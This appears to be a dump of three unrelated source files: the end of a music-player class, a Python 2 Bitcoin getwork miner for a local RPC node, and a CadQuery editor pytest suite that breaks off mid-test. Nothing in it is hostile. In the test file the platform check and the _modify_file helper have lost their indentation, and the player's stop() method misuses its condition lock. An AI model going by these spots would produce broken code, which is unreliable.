        """Raise the volume by 0.1, capped at 1."""
        self.volume += .1
        if self.volume > 1:
            self.volume = 1
        self.notify()

    def decrease_volume(self):
        """Lower the volume by 0.1, floored at 0."""
        self.volume -= .1
        if self.volume < 0:
            self.volume = 0
        self.notify()

    def stop(self):
        """Kill the external player and wake any waiters (best-effort)."""
        try:
            subprocess.Popen("pkill play", shell=True)
            self.cond.notifyAll()
            self.cond.release()
            self.cond.wait()
        except Exception:
            pass

    def pause(self):
        """Pause playback (resume-from-position is not supported, so this
        behaves like stop)."""
        self.is_pause = True
        self.stop()

    def exit(self):
        """Leave music mode: clear the playlist and stop the loop."""
        self.is_stop = True
        self.playlist = []
        self.notify()
|
pyminer.py | #!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15  # seconds to back off after a failed/invalid RPC response
MAX_NONCE = 1000000L  # initial nonce scan range (Python 2 long literal)
settings = {}  # populated from the config file in __main__
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
    """Minimal JSON-RPC 1.1 client over HTTP basic auth (Python 2 httplib)."""
    # NOTE(review): declared as a class attribute but incremented through
    # self, so each instance gets its own id counter after the first call.
    OBJID = 1

    def __init__(self, host, port, username, password):
        authpair = "%s:%s" % (username, password)
        self.authhdr = "Basic %s" % (base64.b64encode(authpair))
        self.conn = httplib.HTTPConnection(host, port, False, 30)  # 30 s timeout

    def rpc(self, method, params=None):
        """POST one JSON-RPC call.

        Returns the 'result' field, the 'error' object if the server reported
        one, or None on a malformed response.
        """
        self.OBJID += 1
        obj = { 'version' : '1.1',
                'method' : method,
                'id' : self.OBJID }
        if params is None:
            obj['params'] = []
        else:
            obj['params'] = params
        self.conn.request('POST', '/', json.dumps(obj),
                          { 'Authorization' : self.authhdr,
                            'Content-type' : 'application/json' })
        resp = self.conn.getresponse()
        if resp is None:
            print "JSON-RPC: no response"
            return None
        body = resp.read()
        resp_obj = json.loads(body)
        if resp_obj is None:
            print "JSON-RPC: cannot JSON-decode body"
            return None
        if 'error' in resp_obj and resp_obj['error'] != None:
            return resp_obj['error']
        if 'result' not in resp_obj:
            print "JSON-RPC: no result in object"
            return None
        return resp_obj['result']

    def getblockcount(self):
        """Return the current block height."""
        return self.rpc('getblockcount')

    def getwork(self, data=None):
        """Fetch new work (data=None) or submit a solved block (data set)."""
        return self.rpc('getwork', data)
def uint32(x):
    """Return *x* truncated to an unsigned 32-bit value."""
    return x & 0xFFFFFFFF
def bytereverse(x):
    """Reverse the byte order of the 32-bit word *x*."""
    swapped = ((x << 24) |
               ((x << 8) & 0x00FF0000) |
               ((x >> 8) & 0x0000FF00) |
               (x >> 24))
    # Inlined 32-bit truncation (the original routed this through uint32()).
    return swapped & 0xFFFFFFFF
def bufreverse(in_buf):
    """Byte-swap *in_buf* within each 32-bit word.

    in_buf is a Python 2 byte string whose length is a multiple of 4; each
    4-byte word is unpacked, byte-reversed and re-packed.
    """
    out_words = []
    for i in range(0, len(in_buf), 4):
        word = struct.unpack('@I', in_buf[i:i+4])[0]
        out_words.append(struct.pack('@I', bytereverse(word)))
    return ''.join(out_words)  # Py2 str join; Python 3 would need b''.join
def wordreverse(in_buf):
    """Reverse the order of the 32-bit words in *in_buf* (Python 2 str)."""
    out_words = []
    for i in range(0, len(in_buf), 4):
        out_words.append(in_buf[i:i+4])
    out_words.reverse()
    return ''.join(out_words)  # Py2 str join; Python 3 would need b''.join
class Miner:
    """Single-process getwork miner (Python 2 code: xrange, long, hex codec)."""

    def __init__(self, id):
        self.id = id
        # Nonce scan range; re-tuned each pass to last ~settings['scantime'] s.
        self.max_nonce = MAX_NONCE

    def work(self, datastr, targetstr):
        """Scan nonces for a share.

        datastr -- hex-encoded 80-byte block header from getwork
        targetstr -- hex-encoded 256-bit target
        Returns (hashes_done, winning_nonce_bytes or None).
        """
        # decode work data hex string to binary
        static_data = datastr.decode('hex')
        static_data = bufreverse(static_data)
        # the first 76b of 80b do not change
        blk_hdr = static_data[:76]
        # decode 256-bit target value
        targetbin = targetstr.decode('hex')
        targetbin = targetbin[::-1]  # byte-swap and dword-swap
        targetbin_str = targetbin.encode('hex')
        target = long(targetbin_str, 16)
        # pre-hash first 76b of block header
        static_hash = hashlib.sha256()
        static_hash.update(blk_hdr)
        for nonce in xrange(self.max_nonce):
            # encode 32-bit nonce value
            nonce_bin = struct.pack("<I", nonce)
            # hash final 4b, the nonce value
            hash1_o = static_hash.copy()
            hash1_o.update(nonce_bin)
            hash1 = hash1_o.digest()
            # sha256 hash of sha256 hash
            hash_o = hashlib.sha256()
            hash_o.update(hash1)
            hash = hash_o.digest()
            # quick test for winning solution: high 32 bits zero?
            if hash[-4:] != '\0\0\0\0':
                continue
            # convert binary hash to 256-bit Python long
            hash = bufreverse(hash)
            hash = wordreverse(hash)
            hash_str = hash.encode('hex')
            l = long(hash_str, 16)
            # proof-of-work test:  hash < target
            if l < target:
                print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
                return (nonce + 1, nonce_bin)
            else:
                print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
                # return (nonce + 1, nonce_bin)
        return (nonce + 1, None)

    def submit_work(self, rpc, original_data, nonce_bin):
        """Splice the winning nonce into the work data and submit it."""
        nonce_bin = bufreverse(nonce_bin)
        nonce = nonce_bin.encode('hex')
        # The nonce occupies hex chars 152-159 of the getwork data field.
        solution = original_data[:152] + nonce + original_data[160:256]
        param_arr = [ solution ]
        result = rpc.getwork(param_arr)
        print time.asctime(), "--> Upstream RPC result:", result

    def iterate(self, rpc):
        """One round-trip: fetch work, scan, maybe submit, re-tune max_nonce."""
        work = rpc.getwork()
        if work is None:
            time.sleep(ERR_SLEEP)
            return
        if 'data' not in work or 'target' not in work:
            time.sleep(ERR_SLEEP)
            return
        time_start = time.time()
        (hashes_done, nonce_bin) = self.work(work['data'],
                                             work['target'])
        time_end = time.time()
        time_diff = time_end - time_start
        # Scale the nonce range so the next scan lasts ~scantime seconds.
        self.max_nonce = long(
            (hashes_done * settings['scantime']) / time_diff)
        if self.max_nonce > 0xfffffffaL:
            self.max_nonce = 0xfffffffaL
        if settings['hashmeter']:
            print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
                self.id, hashes_done,
                (hashes_done / 1000.0) / time_diff)
        if nonce_bin is not None:
            self.submit_work(rpc, work['data'], nonce_bin)

    def loop(self):
        """Mine forever against the configured RPC endpoint."""
        rpc = BitcoinRPC(settings['host'], settings['port'],
                         settings['rpcuser'], settings['rpcpass'])
        if rpc is None:
            return
        while True:
            self.iterate(rpc)
def miner_thread(id):
    """Entry point for one mining process: construct a Miner and loop forever."""
    Miner(id).loop()
if __name__ == '__main__':
    if len(sys.argv) != 2:
        print "Usage: pyminer.py CONFIG-FILE"
        sys.exit(1)
    # Read the config file into `settings` as key=value pairs.
    f = open(sys.argv[1])
    for line in f:
        # skip comment lines
        m = re.search('^\s*#', line)
        if m:
            continue
        # parse key=value lines
        m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
        if m is None:
            continue
        settings[m.group(1)] = m.group(2)
    f.close()
    # Apply defaults for anything the config omitted.
    if 'host' not in settings:
        settings['host'] = '127.0.0.1'
    if 'port' not in settings:
        settings['port'] = 5554
    if 'threads' not in settings:
        settings['threads'] = 1
    if 'hashmeter' not in settings:
        settings['hashmeter'] = 0
    if 'scantime' not in settings:
        settings['scantime'] = 30L
    if 'rpcuser' not in settings or 'rpcpass' not in settings:
        print "Missing username and/or password in cfg file"
        sys.exit(1)
    # Normalize numeric settings (values read from the file are strings).
    settings['port'] = int(settings['port'])
    settings['threads'] = int(settings['threads'])
    settings['hashmeter'] = int(settings['hashmeter'])
    settings['scantime'] = long(settings['scantime'])
    # Spawn one mining process per configured "thread".
    thr_list = []
    for thr_id in range(settings['threads']):
        p = Process(target=miner_thread, args=(thr_id,))
        p.start()
        thr_list.append(p)
        time.sleep(1)  # stagger threads
    print settings['threads'], "mining threads started"
    print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
    try:
        for thr_proc in thr_list:
            thr_proc.join()
    except KeyboardInterrupt:
        pass
    print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
test_app.py | from path import Path
import os, sys, asyncio
if sys.platform == 'win32':
asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())
from multiprocessing import Process
import pytest
import pytestqt
import cadquery as cq
from PyQt5.QtCore import Qt, QSettings
from PyQt5.QtWidgets import QFileDialog, QMessageBox
from cq_editor.__main__ import MainWindow
from cq_editor.widgets.editor import Editor
from cq_editor.cq_utils import export, get_occ_color
# --- CadQuery scripts fed to the editor in the tests below ---

# Basic script: a filleted box bound to `result` (implicit rendering).
code = \
'''import cadquery as cq
result = cq.Workplane("XY" )
result = result.box(3, 3, 0.5)
result = result.edges("|Z").fillet(0.125)'''

# Same shape but larger, to exercise view fitting.
code_bigger_object = \
'''import cadquery as cq
result = cq.Workplane("XY" )
result = result.box(20, 20, 0.5)
result = result.edges("|Z").fillet(0.125)
'''

# Explicit show_object() call on a Workplane.
code_show_Workplane = \
'''import cadquery as cq
result = cq.Workplane("XY" )
result = result.box(3, 3, 0.5)
result = result.edges("|Z").fillet(0.125)
show_object(result)
'''

# show_object() with an explicit name, plus a log() call.
code_show_Workplane_named = \
'''import cadquery as cq
result = cq.Workplane("XY" )
result = result.box(3, 3, 0.5)
result = result.edges("|Z").fillet(0.125)
log('test')
show_object(result,name='test')
'''

# show_object() on a raw cq.Shape (via .val()).
code_show_Shape = \
'''import cadquery as cq
result = cq.Workplane("XY" )
result = result.box(3, 3, 0.5)
result = result.edges("|Z").fillet(0.125)
show_object(result.val())
'''

# debug() rendering path.
code_debug_Workplane = \
'''import cadquery as cq
result = cq.Workplane("XY" )
result = result.box(3, 3, 0.5)
result = result.edges("|Z").fillet(0.125)
debug(result)
'''

# Two top-level results in one script.
code_multi = \
'''import cadquery as cq
result1 = cq.Workplane("XY" ).box(3, 3, 0.5)
result2 = cq.Workplane("XY" ).box(3, 3, 0.5).translate((0,15,0))
'''

# Minimal import chain for nested-module reload tests.
code_nested_top = """import test_nested_bottom
"""
code_nested_bottom = """a=1
"""
def _modify_file(code, path="test.py"):
with open(path, "w", 1) as f:
f.write(code)
def modify_file(code, path="test.py"):
    """Rewrite *path* from a separate process so file watchers see an
    external modification."""
    worker = Process(target=_modify_file, args=(code, path))
    worker.start()
    worker.join()
def get_center(widget):
    """Return *widget*'s position shifted to its center point."""
    center = widget.pos()
    center.setX(center.x() + widget.width() // 2)
    center.setY(center.y() + widget.height() // 2)
    return center
def get_bottom_left(widget):
    """Return *widget*'s position shifted to its bottom-left corner."""
    corner = widget.pos()
    corner.setY(corner.y() + widget.height())
    return corner
def get_rgba(ais):
    """Return (r, g, b, alpha) floats for an AIS object's color.

    Bug fix: the original returned the red channel three times
    (redF, redF, redF); it now returns red, green and blue.  Existing
    callers in this file only read the red and alpha components, so they
    are unaffected.
    """
    alpha = ais.Transparency()
    color = get_occ_color(ais)
    return color.redF(), color.greenF(), color.blueF(), alpha
@pytest.fixture
def main(qtbot,mocker):
    """MainWindow fixture with the default script already executed once."""
    # Auto-confirm any "discard changes?" style dialogs.
    mocker.patch.object(QMessageBox, 'question', return_value=QMessageBox.Yes)
    win = MainWindow()
    win.show()
    qtbot.addWidget(win)
    editor = win.components['editor']
    editor.set_text(code)
    debugger = win.components['debugger']
    debugger._actions['Run'][0].triggered.emit()
    return qtbot, win
@pytest.fixture
def main_clean(qtbot,mocker):
    """MainWindow fixture with the default script loaded but NOT executed."""
    mocker.patch.object(QMessageBox, 'question', return_value=QMessageBox.Yes)
    win = MainWindow()
    win.show()
    qtbot.addWidget(win)
    # NOTE(review): waitForWindowShown is deprecated in newer pytest-qt
    # (waitExposed) — left as-is for compatibility with the pinned version.
    qtbot.waitForWindowShown(win)
    editor = win.components['editor']
    editor.set_text(code)
    return qtbot, win
@pytest.fixture
def main_clean_do_not_close(qtbot,mocker):
    """Like main_clean, but confirmation dialogs answer 'No' (cancel close)."""
    mocker.patch.object(QMessageBox, 'question', return_value=QMessageBox.No)
    win = MainWindow()
    win.show()
    qtbot.addWidget(win)
    qtbot.waitForWindowShown(win)
    editor = win.components['editor']
    editor.set_text(code)
    return qtbot, win
@pytest.fixture
def main_multi(qtbot,mocker):
    """MainWindow fixture with the two-result script executed once; save
    dialogs are patched to return 'out.step'."""
    mocker.patch.object(QMessageBox, 'question', return_value=QMessageBox.Yes)
    mocker.patch.object(QFileDialog, 'getSaveFileName', return_value=('out.step',''))
    win = MainWindow()
    win.show()
    qtbot.addWidget(win)
    qtbot.waitForWindowShown(win)
    editor = win.components['editor']
    editor.set_text(code_multi)
    debugger = win.components['debugger']
    debugger._actions['Run'][0].triggered.emit()
    return qtbot, win
def test_render(main):
    """Each render path (run, show_object, console) adds one tree object."""
    qtbot, win = main
    obj_tree_comp = win.components['object_tree']
    editor = win.components['editor']
    debugger = win.components['debugger']
    console = win.components['console']
    log = win.components['log']
    # enable CQ reloading
    debugger.preferences['Reload CQ'] = True
    # check that object was rendered
    assert(obj_tree_comp.CQ.childCount() == 1)
    # check that object was removed
    obj_tree_comp._toolbar_actions[0].triggered.emit()
    assert(obj_tree_comp.CQ.childCount() == 0)
    # check that object was rendered using explicit show_object call
    editor.set_text(code_show_Workplane)
    debugger._actions['Run'][0].triggered.emit()
    assert(obj_tree_comp.CQ.childCount() == 1)
    obj_tree_comp._toolbar_actions[0].triggered.emit()
    assert(obj_tree_comp.CQ.childCount() == 0)
    # check that cq.Shape object was rendered using explicit show_object call
    editor.set_text(code_show_Shape)
    debugger._actions['Run'][0].triggered.emit()
    assert(obj_tree_comp.CQ.childCount() == 1)
    obj_tree_comp._toolbar_actions[0].triggered.emit()
    assert(obj_tree_comp.CQ.childCount() == 0)
    # test rendering via console
    console.execute(code_show_Workplane)
    assert(obj_tree_comp.CQ.childCount() == 1)
    obj_tree_comp._toolbar_actions[0].triggered.emit()
    assert(obj_tree_comp.CQ.childCount() == 0)
    console.execute(code_show_Shape)
    assert(obj_tree_comp.CQ.childCount() == 1)
    # check object rendering using show_object call with a name specified and
    # debug call
    editor.set_text(code_show_Workplane_named)
    debugger._actions['Run'][0].triggered.emit()
    qtbot.wait(100)
    assert(obj_tree_comp.CQ.child(0).text(0) == 'test')
    assert('test' in log.toPlainText().splitlines()[-1])
def test_export(main,mocker):
    """STL and STEP export actions write the expected files to disk."""
    qtbot, win = main
    debugger = win.components['debugger']
    debugger._actions['Run'][0].triggered.emit()
    #set focus
    obj_tree = win.components['object_tree'].tree
    obj_tree_comp = win.components['object_tree']
    qtbot.mouseClick(obj_tree, Qt.LeftButton)
    qtbot.keyClick(obj_tree, Qt.Key_Down)
    qtbot.keyClick(obj_tree, Qt.Key_Down)
    #export STL
    mocker.patch.object(QFileDialog, 'getSaveFileName', return_value=('out.stl',''))
    obj_tree_comp._export_STL_action.triggered.emit()
    assert(os.path.isfile('out.stl'))
    #export STEP
    mocker.patch.object(QFileDialog, 'getSaveFileName', return_value=('out.step',''))
    obj_tree_comp._export_STEP_action.triggered.emit()
    assert(os.path.isfile('out.step'))
    #clean
    os.remove('out.step')
    os.remove('out.stl')
def number_visible_items(viewer):
    """Count the AIS objects currently displayed in *viewer*'s OCC context."""
    from OCP.AIS import AIS_ListOfInteractive
    displayed = AIS_ListOfInteractive()
    context = viewer._get_context()
    context.DisplayedObjects(displayed)
    return displayed.Extent()
def test_inspect(main):
    """The CQ object inspector lists stack items and toggles their display."""
    qtbot, win = main
    #set focus and make invisible
    obj_tree = win.components['object_tree'].tree
    qtbot.mouseClick(obj_tree, Qt.LeftButton)
    qtbot.keyClick(obj_tree, Qt.Key_Down)
    qtbot.keyClick(obj_tree, Qt.Key_Down)
    qtbot.keyClick(obj_tree, Qt.Key_Space)
    #enable object inspector
    insp = win.components['cq_object_inspector']
    insp._toolbar_actions[0].toggled.emit(True)
    #check if all stack items are visible in the tree
    assert(insp.root.childCount() == 3)
    #check if correct number of items is displayed
    viewer = win.components['viewer']
    insp.setCurrentItem(insp.root.child(0))
    assert(number_visible_items(viewer) == 4)
    insp.setCurrentItem(insp.root.child(1))
    assert(number_visible_items(viewer) == 7)
    insp.setCurrentItem(insp.root.child(2))
    assert(number_visible_items(viewer) == 4)
    insp._toolbar_actions[0].toggled.emit(False)
    assert(number_visible_items(viewer) == 3)
class event_loop(object):
    '''Mock of the QEventLoop used by the debugger component.

    Each exec_() call runs the next queued callback (if any) instead of
    entering a real Qt event loop; exit() is accepted and ignored.
    '''

    def __init__(self, callbacks):
        self.callbacks = callbacks
        self.i = 0

    def exec_(self):
        pending = self.i < len(self.callbacks)
        if pending:
            self.callbacks[self.i]()
        self.i += 1

    def exit(self, *args):
        pass
def patch_debugger(debugger, event_loop_mock):
    """Replace the debugger's inner event-loop entry points with the mock's."""
    loop = debugger.inner_event_loop
    loop.exec_ = event_loop_mock.exec_
    loop.exit = event_loop_mock.exit
def test_debug(main,mocker):
    """Stepping, breakpoints and debug-exit update the variables viewer and
    the number of rendered objects as expected."""
    # store the tracing function
    trace_function = sys.gettrace()

    def assert_func(x):
        '''Needed to perform asserts in lambdas
        '''
        assert(x)

    qtbot, win = main
    #clear all
    obj_tree = win.components['object_tree']
    obj_tree.toolbarActions()[0].triggered.emit()
    editor = win.components['editor']
    editor.set_text(code)
    debugger = win.components['debugger']
    actions = debugger._actions['Run']
    run,debug,step,step_in,cont = actions
    variables = win.components['variables_viewer']
    viewer = win.components['viewer']
    assert(number_visible_items(viewer) == 3)
    #check breakpoints
    assert(debugger.breakpoints == [])
    #check _frames
    assert(debugger._frames == [])
    #test step through
    ev = event_loop([lambda: (assert_func(variables.model().rowCount() == 4),
                              assert_func(number_visible_items(viewer) == 3),
                              step.triggered.emit()),
                     lambda: (assert_func(variables.model().rowCount() == 4),
                              assert_func(number_visible_items(viewer) == 3),
                              step.triggered.emit()),
                     lambda: (assert_func(variables.model().rowCount() == 5),
                              assert_func(number_visible_items(viewer) == 3),
                              step.triggered.emit()),
                     lambda: (assert_func(variables.model().rowCount() == 5),
                              assert_func(number_visible_items(viewer) == 4),
                              cont.triggered.emit())])
    patch_debugger(debugger,ev)
    debug.triggered.emit(True)
    assert(variables.model().rowCount() == 2)
    assert(number_visible_items(viewer) == 4)
    #test exit debug
    ev = event_loop([lambda: (step.triggered.emit(),),
                     lambda: (assert_func(variables.model().rowCount() == 1),
                              assert_func(number_visible_items(viewer) == 3),
                              debug.triggered.emit(False),)])
    patch_debugger(debugger,ev)
    debug.triggered.emit(True)
    assert(variables.model().rowCount() == 1)
    assert(number_visible_items(viewer) == 3)
    #test breakpoint
    ev = event_loop([lambda: (cont.triggered.emit(),),
                     lambda: (assert_func(variables.model().rowCount() == 5),
                              assert_func(number_visible_items(viewer) == 4),
                              cont.triggered.emit(),)])
    patch_debugger(debugger,ev)
    editor.debugger.set_breakpoints([(4,None)])
    debug.triggered.emit(True)
    assert(variables.model().rowCount() == 2)
    assert(number_visible_items(viewer) == 4)
    #test breakpoint without using signals
    ev = event_loop([lambda: (cont.triggered.emit(),),
                     lambda: (assert_func(variables.model().rowCount() == 5),
                              assert_func(number_visible_items(viewer) == 4),
                              cont.triggered.emit(),)])
    patch_debugger(debugger,ev)
    editor.debugger.set_breakpoints([(4,None)])
    debugger.debug(True)
    assert(variables.model().rowCount() == 2)
    assert(number_visible_items(viewer) == 4)
    #test debug() without using signals
    ev = event_loop([lambda: (cont.triggered.emit(),),
                     lambda: (assert_func(variables.model().rowCount() == 5),
                              assert_func(number_visible_items(viewer) == 4),
                              cont.triggered.emit(),)])
    patch_debugger(debugger,ev)
    editor.set_text(code_debug_Workplane)
    editor.debugger.set_breakpoints([(4,None)])
    debugger.debug(True)
    CQ = obj_tree.CQ
    # object 1 (default color)
    r,g,b,a = get_rgba(CQ.child(0).ais)
    assert( a == pytest.approx(0.2) )
    assert( r == 1.0 )
    assert(variables.model().rowCount() == 2)
    assert(number_visible_items(viewer) == 4)
    # restore the tracing function
    sys.settrace(trace_function)
# Script with a syntax error (unclosed parenthesis) for traceback tests.
code_err1 = \
'''import cadquery as cq
(
result = cq.Workplane("XY" ).box(3, 3, 0.5).edges("|Z").fillet(0.125)
'''
# Script raising NameError at runtime (f is undefined).
code_err2 = \
'''import cadquery as cq
result = cq.Workplane("XY" ).box(3, 3, 0.5).edges("|Z").fillet(0.125)
f()
'''
def test_traceback(main):
    """Verify that syntax and runtime errors are reported in the traceback
    viewer for both run and debug modes, and that sys.last_traceback is set."""
    # store the tracing function
    trace_function = sys.gettrace()

    qtbot, win = main

    editor = win.components['editor']
    debugger = win.components['debugger']
    traceback_view = win.components['traceback_viewer']

    actions = debugger._actions['Run']
    run,debug,step,step_in,cont = actions

    editor.set_text(code_err1)
    run.triggered.emit()
    assert('SyntaxError' in traceback_view.current_exception.text())

    debug.triggered.emit()
    assert('SyntaxError' in traceback_view.current_exception.text())
    # a failed debug session must leave the debug action unchecked
    assert(debug.isChecked() == False)

    editor.set_text(code_err2)
    run.triggered.emit()
    assert('NameError' in traceback_view.current_exception.text())
    assert(hasattr(sys, 'last_traceback'))

    del sys.last_traceback
    assert(not hasattr(sys, 'last_traceback'))

    # test last_traceback with debug
    ev = event_loop([lambda: (cont.triggered.emit(),)])
    patch_debugger(debugger,ev)

    debugger.debug(True)
    assert('NameError' in traceback_view.current_exception.text())
    assert(hasattr(sys, 'last_traceback'))

    # restore the tracing function
    sys.settrace(trace_function)
@pytest.fixture
def editor(qtbot):
    """Provide a visible, qtbot-managed Editor widget as (qtbot, widget)."""
    widget = Editor()
    widget.show()
    qtbot.addWidget(widget)
    return qtbot, widget
def conv_line_ends(text):
    """Normalize all line endings in *text* to '\\n' (a trailing newline
    is dropped, matching str.splitlines semantics)."""
    lines = text.splitlines()
    return '\n'.join(lines)
def test_editor(monkeypatch,editor):
    """Exercise the editor component: load, new, open, save, save-as,
    state persistence, and error handling for a missing file."""
    qtbot, editor = editor

    with open('test.py','w') as f:
        f.write(code)

    #check that no text is present
    assert(editor.get_text_with_eol() == '')

    #check that loading from file works properly
    editor.load_from_file('test.py')
    assert(len(editor.get_text_with_eol()) > 0)
    assert(conv_line_ends(editor.get_text_with_eol()) == code)

    #check that clearing to a new document works properly
    editor.new()
    assert(editor.get_text_with_eol() == '')

    #monkeypatch QFileDialog methods
    def filename(*args, **kwargs):
        return 'test.py',None

    def filename2(*args, **kwargs):
        return 'test2.py',None

    monkeypatch.setattr(QFileDialog, 'getOpenFileName',
                        staticmethod(filename))
    monkeypatch.setattr(QFileDialog, 'getSaveFileName',
                        staticmethod(filename2))

    #check that open file works properly
    editor.open()
    assert(conv_line_ends(editor.get_text_with_eol()) == code)

    #check that save file works properly
    editor.new()
    qtbot.mouseClick(editor, Qt.LeftButton)
    qtbot.keyClick(editor,Qt.Key_A)
    assert(editor.document().isModified() == True)
    editor.filename = 'test2.py'
    editor.save()
    assert(editor.document().isModified() == False)

    monkeypatch.setattr(QFileDialog, 'getOpenFileName',
                        staticmethod(filename2))
    editor.open()
    assert(editor.get_text_with_eol() == 'a')

    #check that save as works properly
    os.remove('test2.py')
    editor.save_as()
    assert(os.path.exists(filename2()[0]))

    #test persistence
    settings = QSettings('test')
    editor.saveComponentState(settings)
    editor.new()
    assert(editor.get_text_with_eol() == '')
    editor.restoreComponentState(settings)
    assert(editor.get_text_with_eol() == 'a')

    #test error handling: restoring state pointing at a removed file must not raise
    os.remove('test2.py')
    assert(not os.path.exists('test2.py'))
    editor.restoreComponentState(settings)
@pytest.mark.repeat(1)
def test_editor_autoreload(monkeypatch,editor):
    """Verify that external file changes trigger a re-render only while
    autoreload is enabled, and that saving behaves accordingly."""
    qtbot, editor = editor
    TIMEOUT = 500

    # start out with autoreload enabled
    editor.autoreload(True)

    with open('test.py','w') as f:
        f.write(code)

    assert(editor.get_text_with_eol() == '')

    editor.load_from_file('test.py')
    assert(len(editor.get_text_with_eol()) > 0)

    # wait for reload.
    with qtbot.waitSignal(editor.triggerRerender, timeout=TIMEOUT):
        # modify file - NB: separate process is needed to avoid Windows quirks
        modify_file(code_bigger_object)

    # check that editor has updated file contents
    assert(code_bigger_object.splitlines()[2] in editor.get_text_with_eol())

    # disable autoreload
    editor.autoreload(False)

    # Wait for reload in case it incorrectly happens. A timeout should occur
    # instead because a re-render should not be triggered with autoreload
    # disabled.
    with pytest.raises(pytestqt.exceptions.TimeoutError):
        with qtbot.waitSignal(editor.triggerRerender, timeout=TIMEOUT):
            # re-write original file contents
            modify_file(code)

    # editor should continue showing old contents since autoreload is disabled.
    assert(code_bigger_object.splitlines()[2] in editor.get_text_with_eol())

    # Saving a file with autoreload disabled should not trigger a rerender.
    with pytest.raises(pytestqt.exceptions.TimeoutError):
        with qtbot.waitSignal(editor.triggerRerender, timeout=TIMEOUT):
            editor.save()

    editor.autoreload(True)

    # Saving a file with autoreload enabled should trigger a rerender.
    with qtbot.waitSignal(editor.triggerRerender, timeout=TIMEOUT):
        editor.save()
def test_autoreload_nested(editor):
    """Changes to an imported (nested) module must also trigger a
    re-render when module watching is enabled."""
    qtbot, editor = editor
    TIMEOUT = 500

    editor.autoreload(True)
    editor.preferences['Autoreload: watch imported modules'] = True

    with open('test_nested_top.py','w') as f:
        f.write(code_nested_top)
    with open('test_nested_bottom.py','w') as f:
        f.write("")

    assert(editor.get_text_with_eol() == '')

    editor.load_from_file('test_nested_top.py')
    assert(len(editor.get_text_with_eol()) > 0)

    # wait for reload.
    with qtbot.waitSignal(editor.triggerRerender, timeout=TIMEOUT):
        # modify file - NB: separate process is needed to avoid Windows quirks
        modify_file(code_nested_bottom, 'test_nested_bottom.py')
def test_console(main):
    """Check command execution and text printing in the console component."""
    qtbot, win = main

    console = win.components['console']

    # test execute_command: pushed variables are visible to executed commands
    a = []
    console.push_vars({'a' : a})
    console.execute_command('a.append(1)')
    assert(len(a) == 1)

    # test print_text: the prompt position advances by the printed length
    pos_orig = console._prompt_pos
    console.print_text('a')
    assert(console._prompt_pos == pos_orig + len('a'))
def test_viewer(main):
    """Smoke-test the viewer component by triggering every 'View' action."""
    qtbot, win = main
    viewer = win.components['viewer']

    # not sure how to test this, so only smoke tests:
    # trigger all 'View' actions
    for action in viewer._actions['View']:
        action.trigger()
# Minimal module and a script importing it, used by test_module_import.
code_module = \
'''def dummy(): return True'''

code_import = \
'''from module import dummy
assert(dummy())'''
def test_module_import(main):
    """A script importing a locally saved module must run without errors."""
    qtbot, win = main
    editor = win.components['editor']
    debugger = win.components['debugger']
    traceback_view = win.components['traceback_viewer']

    #save the dummy module
    with open('module.py','w') as f:
        f.write(code_module)

    #run the code importing this module
    editor.set_text(code_import)
    debugger._actions['Run'][0].triggered.emit()

    #verify that no exception was generated
    assert(traceback_view.current_exception.text() == '')
def test_auto_fit_view(main_clean):
    """Camera is refit on first render and on full clears, but not on a
    simple code change unless 'Fit automatically' is enabled."""

    def concat(eye,proj,scale):
        # flatten the camera state into one comparable tuple
        return eye+proj+(scale,)

    def approx_view_properties(eye,proj,scale):
        # approx-comparison counterpart of concat (float tolerance)
        return pytest.approx(eye+proj+(scale,))

    qtbot, win = main_clean
    editor = win.components['editor']
    debugger = win.components['debugger']
    viewer = win.components['viewer']
    object_tree = win.components['object_tree']

    view = viewer.canvas.view
    viewer.preferences['Fit automatically'] = False
    eye0,proj0,scale0 = view.Eye(),view.Proj(),view.Scale()

    # check if camera position is adjusted automatically when rendering for the
    # first time
    debugger.render()
    eye1,proj1,scale1 = view.Eye(),view.Proj(),view.Scale()
    assert( concat(eye0,proj0,scale0) != \
        approx_view_properties(eye1,proj1,scale1) )

    # check if camera position is not changed after code change
    editor.set_text(code_bigger_object)
    debugger.render()
    eye2,proj2,scale2 = view.Eye(),view.Proj(),view.Scale()
    assert( concat(eye1,proj1,scale1) == \
        approx_view_properties(eye2,proj2,scale2) )

    # check if position is adjusted automatically after erasing all objects
    object_tree.removeObjects()
    debugger.render()
    eye3,proj3,scale3 = view.Eye(),view.Proj(),view.Scale()
    assert( concat(eye2,proj2,scale2) != \
        approx_view_properties(eye3,proj3,scale3) )

    # check if position is adjusted automatically if settings are changed
    viewer.preferences['Fit automatically'] = True
    editor.set_text(code)
    debugger.render()
    eye4,proj4,scale4 = view.Eye(),view.Proj(),view.Scale()
    assert( concat(eye3,proj3,scale3) != \
        approx_view_properties(eye4,proj4,scale4) )
def test_preserve_properties(main):
    """Object properties (visibility, color, alpha) survive a re-run when
    the 'Preserve properties on reload' preference is enabled."""
    qtbot, win = main

    debugger = win.components['debugger']
    debugger._actions['Run'][0].triggered.emit()

    object_tree = win.components['object_tree']
    object_tree.preferences['Preserve properties on reload'] = True

    assert(object_tree.CQ.childCount() == 1)

    props = object_tree.CQ.child(0).properties
    props['Visible'] = False
    props['Color'] = '#caffee'
    props['Alpha'] = 0.5

    # re-run and verify the customized properties were preserved
    debugger._actions['Run'][0].triggered.emit()

    assert(object_tree.CQ.childCount() == 1)

    props = object_tree.CQ.child(0).properties
    assert(props['Visible'] == False)
    assert(props['Color'].name() == '#caffee')
    assert(props['Alpha'] == 0.5)
def test_selection(main_multi,mocker):
    """Exercise STEP export of tree selections and the bidirectional
    selection sync between the object tree and the 3D viewer."""
    qtbot, win = main_multi

    viewer = win.components['viewer']
    object_tree = win.components['object_tree']

    CQ = object_tree.CQ
    obj1 = CQ.child(0)
    obj2 = CQ.child(1)

    # export with two selected objects
    obj1.setSelected(True)
    obj2.setSelected(True)
